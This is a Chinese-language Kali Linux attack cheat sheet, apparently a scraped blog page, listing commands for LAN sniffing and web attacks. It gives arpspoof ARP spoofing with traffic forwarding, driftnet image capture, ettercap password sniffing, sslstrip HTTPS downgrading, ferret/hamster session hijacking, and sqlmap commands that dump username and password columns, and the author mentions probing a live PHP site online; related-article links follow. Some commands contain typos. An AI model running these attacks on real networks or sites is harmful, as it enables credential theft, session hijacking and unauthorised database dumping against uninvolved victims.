kali扫描内网ip_kali 局域网嗅探
1、局域网图片嗅探
工具 arpspoof
arpspoof -i eth0 -t 192.1681.10(网卡 目标地址) 192.168.1.1 局域网网关,如果在Windows中可以使用局域网扫描工具 Advanced ip Scanner
linux中 扫描局域网在线的主机 fping -asg 192.168.1.0/24
欺骗的同时不能是对方断网,使用流量转发 echo 1 >/proc/sys/net/ipv4/ip_forward
检查是否成功执行 cat proc/sys/sys/net/ipv4/ip_forward
获取本机网卡的图片 driftnet -i eth0
2、密码嗅探
先使用欺骗命令 arpspoof
ettercap -Tq - i eth0
3、ssh远程连接操作 链接kali shell模式注销
ctrl +Alt +F1 切换到 命令行模式
使用命令 /etc/init.d/ssh start
使用Xshell 链接kali ip
4、抓包https流量
首先编辑 vim /etc/ettercap/etter.conf 修改 ****linux ** 取消 #
开启 sslstrip -a -f -k
开启欺骗 arpspoof 同时转发流量
在https 网址上进行登陆 抓取流量
5、会话劫持登陆已经被别人登陆的网站
快速添加之前使用的命令 ! + 部分命令 就会补全
先使用arpspoof 欺骗 同时流量转发
使用 wireshark 流量抓包工具
使用 ferret 重新生成抓包的工具
ferret -r j加上 抓取的流量包 会生成一个 txt文件
使用 hamster -h打开一个浏览器 -----》 设置代理和端口
或者不适用欺骗,直接使用 ferret -i eth0 然后使用 hamster 浏览网页
另外基于界面的软件 cookieCadger
6、sqlmap 对asp网站的检测
sqlmap -u "www.baidu.com.id=2"
sqlmap -u "www.baidu.com.id=2" --tables
sqlmap -u "www.baidu.com.id=2" --columns -T "user"
sqlmap -u "www.baidu.com.id=2" --dump -C "username ,password" -T "user"
cookie使用 sqlmap -u “ www.baidu.com.php.id=2” --cookie "id=23" --level=2
7、sqlmap 对php网站的检测
sqlmap -u “ www.baidu.com.php.id=2” --is-dba 检测是否是dba 形式 (可以将文件写入目录)
sqlmap -u “ www.baidu.com.php.id=2” --dbs (列出所有的数据库)
sqlmap -u “ www.baidu.com.php.id=2” --current-db (猜测当前的数据库)
sqlmap -u “ www.baidu.com.php.id=2” --tables -D "admin" (根据admin数据库猜测表名)
sqlmap -u “ www.baidu.com.php.id=2” --columns -T "pss" -D "admin"
sqlmap -u “ www.baidu.com.php.id=2” --dump -C "username,password " -T "pss" -D "admin"
8、实例检测
下面是我检测的一个网上的PHP的网站 存在SQL注入的漏洞
9、Metasploit
msfconsole
这一节我之前的微博已经写过很多,不过还没哟整理,想着抽空整理一遍
10、流量分析工具 nload
附: 卸载之前暗转的软件 apt-get remove
修复没有成功安装的软件 apt --fix-broken install
11、metasploit
使用Metasploit 辅助模块 wmap进行扫描(对网站进行集中的扫描)
使用Sqlmap辅助模块进行扫描:
kali扫描内网ip_kali 局域网嗅探相关推荐
- kali扫描内网ip_来,我们聊聊内网渗透!
文章来源:Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全,就一直想自己搭个从 Web 端渗透进入内网的环境玩一下,不过因为不太懂计网的知识,拓扑图也 ...
- kali扫描内网ip_Metasploit路由转发实现内网渗透
利用背景 在渗透的过程中常常会遇到这种场景:我们已经通过web渗透拿下一台内网服务器,为了进一步进行内网渗透,我们会利用"沦陷主机"作为跳板进行进一步的内网渗透,扩大战果. 现在假 ...
- 双网卡电脑同时上内网(局域网)和外网并实现跨网段访问
问题描述:双网卡电脑可以同时访问内网(局域网192.168.202.x)和外网,但是不能跨网段访问内网其他网段(192.168.119.x). 解决方法:1.使用管理员权限打开cmd页面,输入rout ...
- 【查看】 - 内网(局域网)ip 、公网(外网)ip - ipconfig 、 tracert
查看 - 内网(局域网)ip - ipconfig 可见 内网ip = 176.115.10.231 网关 = 176.115.10.1 子网掩码 = 255.255.255.0 ⇒ 确定了 网段 在 ...
- 使用Holer公网SSH访问内网(局域网)Linux系统
1. Holer工具简介 Holer exposes local servers behind NATs and firewalls to the public internet over secur ...
- 2023-5-7 什么是公网、内网、局域网、广域网、互联网?已经有了mac地址为什么还需要ip地址?使用ip地址是如何进行构建互联网的?
2023-5-7 什么是公网.内网.局域网.广域网.互联网?已经有了mac地址为什么还需要ip地址?使用ip地址是如何进行构建互联网的?什么是内网穿透? 文章目录 2023-5-7 什么是公网.内网. ...
- 内网 子网 局域网 外网
为了确定子网,分开主机和路由器的每个接口,从而产生了几个分离的网络岛,接口端连接了这些独立的网络的端点.这些独立的网络中的每个都叫做一个子网(subnet). 你一定对IP地址有所了解吧?我们知道在I ...
- kali入侵内网电脑和入侵外网电脑
生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵) 第一步:输入msfvenom命令生成一个payload,相关参数与命令如下: -p:使用反向远程控制程序"windows/ ...
- kali渗透内网和外网
生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵) 第一步:输入msfvenom命令生成一个payload,相关参数与命令如下: -p:使用反向远程控制程序"windows/ ...
- linux内网穿透局域网frp(实现有网就能访问你的局域网台式机服务器)
一.初衷 一个在家里放服务器搞量化投资的个人玩家,必须得实现内网穿透实现实时监控. (想从任何地点都能访问你的任何主机) 二.前奏 买一个公网ip的主机(我买的是阿里云的,为了防止我这是做广告,请买别 ...
最新文章
- LOCAL_MODULE_TAGS 选项说明(android编译选项选择)
- 为什么说ip协议是无连接协议
- centos oracle sqlplus,centos 下oracle sqlplus乱码问题解决
- 旋转矩阵与欧拉角的相互转换及代码
- 按住 ctrl 并滚动鼠标滚轮才可缩放地图_鼠标永远快不过键盘!32组PS常用快捷键你值得拥有!...
- 学习基础的html代码知识(入门篇)
- 运维人员必须熟悉的运维工具汇总
- 度中心性(degree)、接近中心性(closeness)和中介中心性(betweenness)的理解
- php yar 安装失败_全面解析php7安装yar扩展的方法
- MFC的导航窗格浮窗设计
- hive启动报错:Relative path in absolute URI:${system:java.io.tmpdir%7D/$%7Bsystem:user.name%7D
- revit相关报错合集
- python之decimal
- Simple-fasterrcnn源码学习笔记(4)
- 云服务器-API接口
- C语言多线程运行时间计算
- ubuntu20安装出现致命错误_Ubuntu 20.04 依赖包安装错误解决方案
- 美元指数站稳脚跟,下周耶伦再掀风暴
- ICASSP2023论文分享 | DST:基于Transformer的可变形语音情感识别模型
- 2022-2028全球求职网站行业调研及趋势分析报告
热门文章
- ucore lab1 系统软件启动过程 实验报告
- 双三次插值 python实现_双三次插值Python
- 普林斯顿陈丹琦团队最新论文:受GPT-3启发,用小样本学习给语言模型做微调,性能最高提升30% | AI 日报...
- MSI GT60 16F4升级、超频、解锁功耗限制的研究
- 层次分析法(AHP)原理以及应用
- Win10激活提示“无法连接到你组织的激活服务器”如何解决【解决方法】
- 程序员 开发人员 在线工具箱
- Arduino基础学习-SG90舵机的使用
- Windows无法安装到这个磁盘,选中的磁盘具有MBR分区表的解决方法
- ABAQUS混凝土CDP插件,一键生成混凝土CDP本构曲线